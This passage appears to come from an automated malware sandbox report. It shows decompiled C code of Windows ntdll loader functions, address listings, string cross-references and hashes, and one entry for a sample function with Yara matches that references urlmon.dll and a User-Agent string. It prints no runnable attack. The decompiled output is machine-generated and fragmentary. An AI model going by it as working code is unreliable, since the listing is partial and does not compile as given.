					if( *_v48 != 0) {
						E0192BB40(_t267,  &_v68, _t224);
						if(L018F43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                              0x018f3d3c
                                              0x018f3d42
                                              0x018f3d44
                                              0x018f3d46
                                              0x018f3d49
                                              0x018f3d4c
                                              0x018f3d4f
                                              0x018f3d52
                                              0x018f3d55
                                              0x018f3d58
                                              0x018f3d5b
                                              0x018f3d5f
                                              0x018f3d61
                                              0x018f3d66
                                              0x01948213
                                              0x01948218
                                              0x018f4085
                                              0x018f4088
                                              0x018f408e
                                              0x018f4094
                                              0x018f409a
                                              0x018f40a0
                                              0x018f40a6
                                              0x018f40a9
                                              0x018f40af
                                              0x018f40b6
                                              0x018f40bd
                                              0x018f40bd
                                              0x018f3d83
                                              0x0194821f
                                              0x01948229
                                              0x01948238
                                              0x01948238
                                              0x0194823d
                                              0x0194823d
                                              0x018f3da0
                                              0x018f3daf
                                              0x018f3db5
                                              0x018f3dba
                                              0x018f3dba
                                              0x018f3dd4
                                              0x018f3e94
                                              0x018f3eab
                                              0x018f3f6d
                                              0x018f3f84
                                              0x018f406b
                                              0x018f406b
                                              0x018f406e
                                              0x018f406e
                                              0x018f4070
                                              0x018f4074
                                              0x01948351
                                              0x01948351
                                              0x018f407a
                                              0x018f407f
                                              0x0194835d
                                              0x01948370
                                              0x01948377
                                              0x01948379
                                              0x0194837c
                                              0x0194837c
                                              0x0194835d
                                              0x00000000
                                              0x018f407f
                                              0x018f3f8a
                                              0x018f3f8d
                                              0x018f3f90
                                              0x018f3f95
                                              0x0194830d
                                              0x0194830f
                                              0x018f3f9b
                                              0x018f3fac
                                              0x018f3fae
                                              0x018f3fb1
                                              0x018f3fb1
                                              0x018f3fb6
                                              0x01948317
                                              0x0194831a
                                              0x00000000
                                              0x018f3fbc
                                              0x018f3fc1
                                              0x018f3fc9
                                              0x018f3fd7
                                              0x018f3fda
                                              0x018f3fdd
                                              0x018f4021
                                              0x018f4021
                                              0x018f4029
                                              0x018f4030
                                              0x018f4044
                                              0x018f4046
                                              0x018f4046
                                              0x018f4044
                                              0x018f4049
                                              0x01948327
                                              0x01948334
                                              0x01948339
                                              0x0194833c
                                              0x018f404f
                                              0x018f404f
                                              0x018f404f
                                              0x018f4051
                                              0x018f4056
                                              0x018f4063
                                              0x018f4063
                                              0x018f4068
                                              0x00000000
                                              0x018f4068
                                              0x018f3fdf
                                              0x018f3fe2
                                              0x018f3fe4
                                              0x018f3fe7
                                              0x018f3fef
                                              0x018f4003
                                              0x018f4005
                                              0x018f4005
                                              0x018f400c
                                              0x018f4013
                                              0x018f4016
                                              0x018f4017
                                              0x018f401b
                                              0x018f401e
                                              0x00000000
                                              0x018f401e
                                              0x018f3fb6
                                              0x018f3eb1
                                              0x018f3eb4
                                              0x018f3eb7
                                              0x018f3ebc
                                              0x019482a9
                                              0x019482ab
                                              0x018f3ec2
                                              0x018f3ed3
                                              0x018f3ed5
                                              0x018f3ed8
                                              0x018f3ed8
                                              0x018f3edd
                                              0x019482b3
                                              0x019482b6
                                              0x00000000
                                              0x018f3ee3
                                              0x018f3ee8
                                              0x018f3eed
                                              0x018f3ef0
                                              0x018f3ef3
                                              0x018f3f02
                                              0x018f3f05
                                              0x018f3f08
                                              0x019482c0
                                              0x019482c3
                                              0x019482c5
                                              0x019482c8
                                              0x019482d0
                                              0x019482e4
                                              0x019482e6
                                              0x019482e6
                                              0x019482ed
                                              0x019482f4
                                              0x019482f7
                                              0x019482f8
                                              0x019482fc
                                              0x019482ff
                                              0x019482ff
                                              0x018f3f0e
                                              0x018f3f11
                                              0x018f3f16
                                              0x018f3f1d
                                              0x018f3f31
                                              0x01948307
                                              0x01948307
                                              0x018f3f31
                                              0x018f3f39
                                              0x018f3f48
                                              0x018f3f4d
                                              0x018f3f50
                                              0x018f3f50
                                              0x018f3f53
                                              0x018f3f58
                                              0x018f3f65
                                              0x018f3f65
                                              0x018f3f6a
                                              0x00000000
                                              0x018f3f6a
                                              0x018f3edd
                                              0x018f3dda
                                              0x018f3ddd
                                              0x018f3de0
                                              0x018f3de5
                                              0x01948245
                                              0x018f3deb
                                              0x018f3df7
                                              0x018f3dfc
                                              0x018f3dfe
                                              0x018f3e01
                                              0x018f3e01
                                              0x018f3e06
                                              0x0194824d
                                              0x0194824f
                                              0x01948254
                                              0x00000000
                                              0x018f3e0c
                                              0x018f3e11
                                              0x018f3e16
                                              0x018f3e19
                                              0x018f3e29
                                              0x018f3e2c
                                              0x018f3e2f
                                              0x0194825c
                                              0x0194825f
                                              0x01948261
                                              0x01948264
                                              0x0194826c
                                              0x01948280
                                              0x01948282
                                              0x01948282
                                              0x01948289
                                              0x01948290
                                              0x01948293
                                              0x01948294
                                              0x01948298
                                              0x0194829b
                                              0x0194829b
                                              0x018f3e35
                                              0x018f3e38
                                              0x018f3e3d
                                              0x018f3e44
                                              0x018f3e58
                                              0x019482a3
                                              0x019482a3
                                              0x018f3e58
                                              0x018f3e60
                                              0x018f3e6f
                                              0x018f3e74
                                              0x018f3e77
                                              0x018f3e77
                                              0x018f3e7a
                                              0x018f3e7f
                                              0x018f3e8c
                                              0x018f3e8c
                                              0x018f3e91
                                              0x00000000
                                              0x018f3e91

                                              Strings
                                              • Kernel-MUI-Language-Allowed, xrefs: 018F3DC0
                                              • Kernel-MUI-Number-Allowed, xrefs: 018F3D8C
                                              • Kernel-MUI-Language-Disallowed, xrefs: 018F3E97
                                              • Kernel-MUI-Language-SKU, xrefs: 018F3F70
                                              • WindowsExcludedProcs, xrefs: 018F3D6F
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                              • API String ID: 0-258546922
                                              • Opcode ID: c107189b849611e63071afdb5f7ced11b5497bfebe754c6288abcb6939abee79
                                              • Instruction ID: f1e5deaad3a4697e17f8bf5f07f3a0d1d2e6abed068e15dd8f5e295b298b1c52
                                              • Opcode Fuzzy Hash: c107189b849611e63071afdb5f7ced11b5497bfebe754c6288abcb6939abee79
                                              • Instruction Fuzzy Hash: 4BF1F872D00619EBCB15DFD8C980AEEBBB9FF58750F15006AEA05E7251E7359A01CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00415760, Relevance: 6.4, Strings: 5, Instructions: 164COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: Us$: $er-A$gent$urlmon.dll
                                              • API String ID: 0-1367105278
                                              • Opcode ID: f7b25de653cba3c7a340a7be68eb334dd4bd007b059be1358b379c8992364724
                                              • Instruction ID: b90b82e2bcc5e4791cb9ab7027b903a29d4f78733cb77cd6afc1b506c52bbb04
                                              • Opcode Fuzzy Hash: f7b25de653cba3c7a340a7be68eb334dd4bd007b059be1358b379c8992364724
                                              • Instruction Fuzzy Hash: 92416D72D05614AFD7009E65DC42BEFB7B8EF81724F04025FEC4497281D3799A9287DA
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01918E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 44%
                                              			E01918E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x19dd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x19d8464; // 0x74e10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x19d5780 & 0x00000003) != 0) {
							E01965510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x19d5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0192B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x19d7984; // 0x1482b18
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x19d8464; // 0x74e10110
					 *0x19db1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01919B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x19d5780 & 0x00000005) != 0) {
						_push(_t49);
						E01965510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                              0x01918e0f
                                              0x01918e16
                                              0x01918e19
                                              0x01918e1b
                                              0x01918e21
                                              0x01918e7f
                                              0x01918e85
                                              0x01959354
                                              0x0195936c
                                              0x01959371
                                              0x0195937b
                                              0x01959381
                                              0x01959381
                                              0x0195937b
                                              0x01918e9d
                                              0x01918e9d
                                              0x01918e29
                                              0x01918e2c
                                              0x01918e38
                                              0x01918e3e
                                              0x01918e43
                                              0x01918eb5
                                              0x01918eb9
                                              0x019592aa
                                              0x019592af
                                              0x019592e8
                                              0x019592e8
                                              0x019592af
                                              0x01918eb9
                                              0x01918e45
                                              0x01918e53
                                              0x01918e5b
                                              0x01918e5f
                                              0x01918e78
                                              0x01918e78
                                              0x01918e7d
                                              0x01918ec3
                                              0x01918ecd
                                              0x01918ed2
                                              0x01918ed2
                                              0x01918ec5
                                              0x01918ec5
                                              0x00000000
                                              0x01918e7d
                                              0x01918e67
                                              0x01918ea4
                                              0x0195931a
                                              0x00000000
                                              0x00000000
                                              0x01959320
                                              0x01918ea4
                                              0x01918e70
                                              0x01959325
                                              0x01959340
                                              0x01959345
                                              0x01959345
                                              0x01918e76
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              Strings
                                              • LdrpFindDllActivationContext, xrefs: 01959331, 0195935D
                                              • minkernel\ntdll\ldrsnap.c, xrefs: 0195933B, 01959367
                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0195932A
                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 01959357
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                              • API String ID: 0-3779518884
                                              • Opcode ID: 9f87bb8c14dc25a759baec0779c6b2896feb6753bff3170cb61769c2429fa587
                                              • Instruction ID: e035cdfff0b1530630469dbe942d5c09d0c29152b523c2ad295485a4630fc761
                                              • Opcode Fuzzy Hash: 9f87bb8c14dc25a759baec0779c6b2896feb6753bff3170cb61769c2429fa587
                                              • Instruction Fuzzy Hash: 8E412B31A0031DDEEF36BA1C888DE75BAB8AB0174AF06452DE90C9755AE770BDC093C1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 018F8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 83%
                                              			E018F8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E018F934A() != 0) {
								_t159 = E0196A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x19d5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01965510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x19d5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E018F849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E018F8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E018F8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x19d5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x19d5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01902280(_t92, 0x19d86cc);
															_t94 = E019B9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E019161A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x19d5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E018F8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x19d5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x19d5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0192F380(_t136, 0x18c1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01902280(_t108, 0x19d86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E019161A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E019B9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E018FFFB0(_t118, _t156, 0x19d86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01929A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                              0x018f8799
                                              0x018f879d
                                              0x018f87a1
                                              0x018f87a3
                                              0x018f87a8
                                              0x018f87c3
                                              0x018f87c3
                                              0x018f87c8
                                              0x018f87d1
                                              0x018f87d4
                                              0x018f87d8
                                              0x018f87e5
                                              0x018f87ec
                                              0x01949bfe
                                              0x01949c00
                                              0x01949c02
                                              0x01949c08
                                              0x01949c0d
                                              0x01949c0f
                                              0x01949c14
                                              0x01949c2d
                                              0x01949c32
                                              0x01949c37
                                              0x01949c3a
                                              0x01949c3c
                                              0x01949c42
                                              0x01949c42
                                              0x01949c3c
                                              0x01949c02
                                              0x018f87da
                                              0x018f87df
                                              0x018f87e3
                                              0x00000000
                                              0x00000000
                                              0x018f87e3
                                              0x018f87f2
                                              0x00000000
                                              0x018f87fb
                                              0x018f87fd
                                              0x018f87fe
                                              0x018f880e
                                              0x018f880f
                                              0x018f8810
                                              0x018f8814
                                              0x018f881a
                                              0x018f881c
                                              0x018f881f
                                              0x018f8821
                                              0x018f8822
                                              0x018f8824
                                              0x018f8826
                                              0x018f882c
                                              0x018f882e
                                              0x01949c48
                                              0x01949c48
                                              0x018f8834
                                              0x018f8834
                                              0x018f8837
                                              0x00000000
                                              0x00000000
                                              0x018f8837
                                              0x018f882e
                                              0x018f883d
                                              0x018f8840
                                              0x018f8843
                                              0x018f8846
                                              0x018f8849
                                              0x018f884c
                                              0x018f884e
                                              0x018f8850
                                              0x018f8852
                                              0x018f8854
                                              0x018f8857
                                              0x018f88b4
                                              0x018f88b6
                                              0x018f88b6
                                              0x018f8859
                                              0x018f8859
                                              0x018f8859
                                              0x018f8861
                                              0x018f8866
                                              0x018f886a
                                              0x018f893d
                                              0x018f8941
                                              0x00000000
                                              0x018f8947
                                              0x018f8947
                                              0x018f894a
                                              0x018f894c
                                              0x00000000
                                              0x018f8952
                                              0x018f8955
                                              0x018f895a
                                              0x018f895d
                                              0x018f895d
                                              0x018f895f
                                              0x018f8961
                                              0x018f8961
                                              0x018f8968
                                              0x00000000
                                              0x00000000
                                              0x018f896a
                                              0x018f896b
                                              0x018f896e
                                              0x00000000
                                              0x018f8970
                                              0x018f8970
                                              0x018f8970
                                              0x018f8970
                                              0x018f8972
                                              0x018f8972
                                              0x018f8974
                                              0x00000000
                                              0x018f897a
                                              0x018f897a
                                              0x018f897d
                                              0x00000000
                                              0x018f8983
                                              0x01949c65
                                              0x01949c6d
                                              0x01949c72
                                              0x01949c75
                                              0x01949c75
                                              0x01949c82
                                              0x01949c86
                                              0x01949c87
                                              0x01949c88
                                              0x01949c89
                                              0x01949c8c
                                              0x01949c90
                                              0x01949c95
                                              0x01949c97
                                              0x01949ca0
                                              0x01949ca3
                                              0x01949ca9
                                              0x01949ca9
                                              0x00000000
                                              0x01949ca9
                                              0x01949ca3
                                              0x00000000
                                              0x01949c97
                                              0x018f897d
                                              0x00000000
                                              0x018f8974
                                              0x018f8988
                                              0x018f8992
                                              0x018f8996
                                              0x00000000
                                              0x018f8996
                                              0x018f894c
                                              0x00000000
                                              0x018f8870
                                              0x018f887b
                                              0x018f887d
                                              0x018f887f
                                              0x018f8881
                                              0x018f8884
                                              0x018f8884
                                              0x018f8886
                                              0x018f8889
                                              0x018f888c
                                              0x018f888e
                                              0x018f8891
                                              0x018f8891
                                              0x018f8898
                                              0x00000000
                                              0x00000000
                                              0x018f889a
                                              0x018f889b
                                              0x018f889e
                                              0x00000000
                                              0x00000000
                                              0x018f88a0
                                              0x018f88a8
                                              0x018f88b0
                                              0x018f88b2
                                              0x018f88d3
                                              0x018f88d5
                                              0x00000000
                                              0x018f88d7
                                              0x018f88db
                                              0x018f88dc
                                              0x018f88e0
                                              0x018f88e8
                                              0x018f88ee
                                              0x018f88f0
                                              0x018f88f3
                                              0x018f88fc
                                              0x018f8901
                                              0x018f8906
                                              0x018f890c
                                              0x018f890c
                                              0x018f890f
                                              0x018f8916
                                              0x018f8917
                                              0x018f8918
                                              0x018f8919
                                              0x018f891a
                                              0x018f891f
                                              0x018f8921
                                              0x01949c52
                                              0x01949c55
                                              0x01949c5b
                                              0x01949cac
                                              0x01949cc0
                                              0x01949cc0
                                              0x01949c55
                                              0x018f8927
                                              0x018f8927
                                              0x018f892f
                                              0x018f8933
                                              0x00000000
                                              0x018f88f5
                                              0x018f88f5
                                              0x00000000
                                              0x018f88f7
                                              0x018f88f7
                                              0x018f88fa
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x018f88fa
                                              0x018f88f5
                                              0x018f88f3
                                              0x00000000
                                              0x018f88d5
                                              0x00000000
                                              0x018f88b2
                                              0x018f88c9
                                              0x00000000
                                              0x018f88c9
                                              0x018f887f
                                              0x018f886a
                                              0x018f8857
                                              0x018f8852
                                              0x018f88bf
                                              0x018f88bf
                                              0x018f87aa
                                              0x018f87ad
                                              0x018f87ae
                                              0x018f87b4
                                              0x018f87b5
                                              0x018f87b6
                                              0x018f87b8
                                              0x018f87bd
                                              0x018f87c1
                                              0x018f87f4
                                              0x018f87fa
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x018f87c1
                                              0x00000000

                                              Strings
                                              • minkernel\ntdll\ldrsnap.c, xrefs: 01949C28
                                              • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01949C18
                                              • LdrpDoPostSnapWork, xrefs: 01949C1E
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                              • API String ID: 2994545307-1948996284
                                              • Opcode ID: 0bd3615cf86db8f1425639e2e47f5ec60d5743dc7ad5504886da79c84d9fb702
                                              • Instruction ID: 115f4ae17fec64627a0ae599477dc7b75d8facf355fe9691fc73f4aa024b213d
                                              • Opcode Fuzzy Hash: 0bd3615cf86db8f1425639e2e47f5ec60d5743dc7ad5504886da79c84d9fb702
                                              • Instruction Fuzzy Hash: FD910231A1021A9FEB28DF59D480ABABBB5FF86315F15416DDB09EB241D730EA41CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 018F7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 98%
                                              			E018F7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E018FCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E018EC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x19d5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01965510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x19d5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01907D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
